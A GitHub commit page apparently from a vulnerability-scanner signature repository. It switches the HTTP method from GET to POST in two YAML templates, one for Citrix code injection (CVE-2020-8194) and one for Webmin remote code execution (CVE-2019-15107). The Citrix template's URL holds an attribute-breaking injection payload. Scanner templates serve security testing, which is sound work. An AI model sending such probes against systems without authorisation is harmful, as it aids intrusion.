Skip to content

Commit

Permalink
Refactor merge request from cvebase.com
Browse files Browse the repository at this point in the history
  • Loading branch information
j3ssie committed Nov 11, 2020
1 parent 4c4f28f commit 5ee3e13
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion cves/citrix-code-injection-cve-2020-8194.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ params:
- root: '{{.BaseURL}}'

requests:
- method: GET
- method: POST
url: >-
{{.root}}/menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
headers:
Expand Down
2 changes: 1 addition & 1 deletion cves/webmin-rce-cve-2019-15107.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ variables:
- endpoint: |
password_change.cgi
requests:
- method: GET
- method: POST
url: >-
{{.root}}/{{.endpoint}}
headers:
Expand Down

0 comments on commit 5ee3e13

Please sign in to comment.